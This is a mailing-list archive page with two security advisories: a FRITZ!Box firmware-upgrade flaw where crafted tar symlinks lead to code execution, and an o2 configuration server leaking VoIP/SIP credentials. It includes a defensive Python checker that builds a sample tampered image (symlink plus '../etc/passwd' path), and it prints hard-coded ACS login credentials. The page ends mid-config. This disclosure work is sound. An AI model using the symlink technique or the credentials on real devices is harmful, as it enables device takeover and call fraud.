[FD] [RT-SA-2014-014] AVM FRITZ!Box: Arbitrary Code Execution Through Manipulated Firmware Images

2016-01-07 Thread RedTeam Pentesting GmbH
Advisory: AVM FRITZ!Box: Arbitrary Code Execution Through Manipulated Firmware Images

The firmware upgrade process of the FRITZ!Box 7490 is flawed. Specially
crafted firmware images can overwrite critical files. Arbitrary code can
get executed if an attempt is made to install such a manipulated
firmware.


Details
=======

Product: AVM FRITZ!Box 7490, possibly others
Affected Versions: versions prior to 6.30 [0]
Fixed Versions: >= 6.30 [0]
Vulnerability Type: Authenticated Code Execution
Security Risk: medium
Vendor URL: http://avm.de/
Vendor Status: fixed version released
Advisory URL: https://www.redteam-pentesting.de/advisories/rt-sa-2014-014
Advisory Status: published
CVE: CVE-2014-8886
CVE URL: https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2014-8886


Introduction
============

FRITZ!Box is the brand name of SOHO routers/CPE manufactured by AVM
GmbH. The FRITZ!Box usually combines features such as an xDSL modem, a
wifi access point, routing, VoIP, NAS and DECT.


More Details
============

AVM regularly publishes firmware updates to address bugs and to
introduce new features. The firmware image can either be uploaded
manually or the FRITZ!Box downloads it semi-automatically from
http://download.avm.de/ via unencrypted HTTP if a new version is
available.

Technically, AVM firmware images are tar files:

$ tar --list --file FRITZ.Box_7490.113.06.20.image
./var/
./var/install
./var/chksum
./var/info.txt
./var/tmp/
./var/tmp/filesystem.image
./var/tmp/kernel.image
./var/regelex
./var/signature

When transferred to the FRITZ!Box, updates are extracted to the root
directory before their cryptographic signature is verified. Thus,
critical files can be overwritten by specially crafted firmware images.
Attackers can use this weakness to execute arbitrary code.

For example, the root directory of the web interface is located at
/var/html (ramdisk), which is a symlink that points to /usr/www/avm
(read-only squashfs). If the victim uploads a tar file that contains a
symlink called ./var/html, the web server's root directory is relocated
to whatever the malicious symlink points to, e.g. ./var/redteam. There,
attackers can place arbitrary content, such as CGIs. Once invoked by a
browser, arbitrary code can be executed.

As the signature check will inevitably fail, the victim will be asked
whether the unsigned firmware image should be processed or not. That
confirmation page is formatted by CSS. As a result, the victim's browser
will try to reload the main.css, which is now under the control of the
attacker. The attacker can manipulate the main.css to trick the victim's
browser into loading an attacker-controlled CGI. In total, the upload of
a manipulated firmware image can immediately lead to code execution
without the need of further action by the victim.


Proof of Concept
================

The following command generates a firmware image that leads to code
execution when uploaded to a FRITZ!Box 7490. As soon as the FRITZ!Box
reports the signature mismatch, a password-less telnetd listening on
port  will be started.


Workaround
==========

Check each firmware image manually for suspicious file names, before
uploading to the FRITZ!Box. A more precise workaround does not exist at
the moment.
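The following script is an added example (not part of the advisory and not AVM tooling) that automates the manual check described above: it lists a firmware tar and flags symlinks, hard links, entries outside ./var/ and paths that escape the extraction root. The two sample images are constructed in memory; EXPECTED_PREFIX and the function names are this example's own choices.

```python
import io
import posixpath
import tarfile

# A stock 7490 image only carries entries below ./var/ (see the tar listing above).
EXPECTED_PREFIX = "var/"


def _normalised(name: str) -> str:
    """Drop the leading './' and collapse '.' components, keep '..' visible."""
    return posixpath.normpath(name).lstrip("/")


def check_image(data: bytes) -> list:
    """Return (member_name, reason) findings; an empty list means nothing suspicious."""
    findings = []
    with tarfile.open(fileobj=io.BytesIO(data), mode="r:*") as tar:
        for m in tar.getmembers():
            name = _normalised(m.name)
            if m.issym():  # e.g. ./var/html redirected to attacker content
                findings.append((m.name, "symlink -> %s" % m.linkname))
            elif m.islnk():
                findings.append((m.name, "hard link -> %s" % m.linkname))
            elif not (m.isfile() or m.isdir()):
                findings.append((m.name, "unexpected entry type"))
            if m.name.startswith("/") or name.startswith(".."):
                findings.append((m.name, "path escapes extraction root"))
            elif name != "var" and not name.startswith(EXPECTED_PREFIX):
                findings.append((m.name, "outside ./var/"))
    return findings


def _build_image(entries) -> bytes:
    """Constructed sample image; entries are (name, kind, content_or_target)."""
    buf = io.BytesIO()
    with tarfile.open(fileobj=buf, mode="w") as tar:
        for name, kind, extra in entries:
            info = tarfile.TarInfo(name)
            if kind == "dir":
                info.type = tarfile.DIRTYPE
                tar.addfile(info)
            elif kind == "sym":
                info.type = tarfile.SYMTYPE
                info.linkname = extra
                tar.addfile(info)
            else:
                info.size = len(extra)
                tar.addfile(info, io.BytesIO(extra))
    return buf.getvalue()


# Constructed stand-ins: a benign image and one using the ./var/html symlink trick.
STOCK_IMAGE = _build_image([("./var/", "dir", None),
                            ("./var/install", "file", b"#!/bin/sh\n")])
TAMPERED_IMAGE = _build_image([("./var/", "dir", None),
                               ("./var/html", "sym", "./var/redteam"),
                               ("../etc/passwd", "file", b"x\n")])
```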


Fix
===

Customers should upgrade to a fixed firmware version as soon as
possible. Before upgrading, they should check the new firmware image for
suspicious file names (see "Workaround").


Security Risk
=============

This vulnerability allows an attacker to inject arbitrary code into AVM
firmware images. If the attacker is able to perform a man-in-the-middle
attack between the AVM FRITZ!Box and http://download.avm.de/, firmware
images can be manipulated in transit. Otherwise, attackers need to trick
their victims into installing a malicious firmware image. While
successful attacks result in the full compromise of a device, they would
typically require an attacker in a very strong position. The
vulnerability is therefore considered to pose a medium risk.


Timeline
========

2014-10-14 Vulnerability identified
2014-10-16 Vendor notified
2014-11-11 CVE requested
2014-11-11 Vendor announced patch
2014-11-14 CVE number assigned

[FD] [RT-SA-2015-005] o2/Telefonica Germany: ACS Discloses VoIP/SIP Credentials

2016-01-07 Thread RedTeam Pentesting GmbH
Advisory: o2/Telefonica Germany: ACS Discloses VoIP/SIP Credentials

The o2 Auto Configuration Server (ACS) discloses VoIP/SIP credentials of
arbitrary customers when receiving manipulated CWMP packets. These
credentials can then be used by an attacker to register any VoIP number
of the victim. This enables the attacker to place and receive calls on
behalf of the attacked user.


Details
=======

Product: o2 DSL Auto Configuration Server
Vulnerability Type: Information Disclosure
Security Risk: high
Vendor URL: https://o2online.de/
Vendor Status: fixed
Advisory URL: https://www.redteam-pentesting.de/advisories/rt-sa-2015-005
Advisory Status: published
CVE: GENERIC-MAP-NOMATCH
CVE URL: https://cve.mitre.org/cgi-bin/cvename.cgi?name=GENERIC-MAP-NOMATCH


Introduction
============

TR-069 (Technical Report 069) is a Broadband Forum technical
specification entitled "CPE WAN Management Protocol" (CWMP). It defines
an application layer protocol for remote management of end-user devices.

(from Wikipedia)

A more technical introduction to TR-069 can be found in a deck of slides
which the Interoperability Laboratory at the University of New Hampshire
has published on that topic [0].


More Details
============

The German Internet Service Provider o2 uses the TR-069 protocol for the
provisioning of Customer Premises Equipment (CPE). Among other settings,
VoIP/SIP credentials are transferred and VoIP telephony is set up.

In our setup, an AVM FRITZ!Box 7490 was monitored during the initial
autoconfiguration process. During that process, several CWMP messages
are exchanged. These CWMP messages are transferred via HTTPS as SOAP
requests and replies. The HTTPS connection is always established by the
CPE which connects to the Auto Configuration Server (ACS). According to
the CWMP, the CPE may do so on the occasion of several events,
including, but not limited to:

* BOOTSTRAP          - first contact between CPE and ACS
* BOOT               - when CPE has rebooted
* PERIODIC           - after a period of time, defined by the ACS
* CONNECTION REQUEST - ACS signals a connection request to the CPE via a
                       second HTTP channel

The "CONNECTION REQUEST" is the only event that can be triggered by the
ACS. To do so, the ACS establishes an unencrypted HTTP connection to the
CPE and authenticates via HTTP basic access authentication with a
"ConnectionRequestUsername" and a "ConnectionRequestPassword". No
further data is exchanged on that channel. Once the CPE has verified the
credentials, it then initiates the real CWMP conversation by sending a
CWMP-Inform message to the pre-defined ACS. The connection initiated by
the CPE is TLS-secured and the CPE provides a username
(ManagementServer.Username) and a password (ManagementServer.Password)
to authenticate itself towards the ACS.

A typical CWMP conversation (including the "CONNECTION REQUEST" event)
is depicted below:


   ACS  --Connection Request (HTTP, to CPE port 8089)-->  CPE

   CPE  -------Inform--------------------------------->  ACS  (CWMP over
   CPE  <------InformResponse--------------------------  ACS   HTTPS, ACS
   CPE  -------[empty]-------------------------------->  ACS   port 443)
   CPE  <------SetParameterValues----------------------  ACS
   CPE  -------SetParameterValuesResponse------------->  ACS
   CPE  <------SetParameterValues----------------------  ACS
                           [...]
   CPE  -------SetParameterValuesResponse------------->  ACS
   CPE  <------[empty]---------------------------------  ACS

During our research, it was observed that the ACS URL as well as
credentials for the initial connection to the ACS are hard-coded. On a
stock AVM FRITZ!Box, running the firmware version 6.20, these can be
found in the file ./providers/otwored/tr069.cfg which is part of the
archive /etc/default.Fritz_Box_HW185/avm/providers-049.tar. For
o2/Telefonica these credentials are:

tr069cfg {
        enabled = yes;
        igd {
                DeviceInfo {
                        ProvisioningCode = "";
                }
                managementserver {
                        url = "https://acs.o2online.de/nbbs/tr69";
                        username = "00040E-";
                        password = "o2acs";
                        URLAlreadyContacted = no;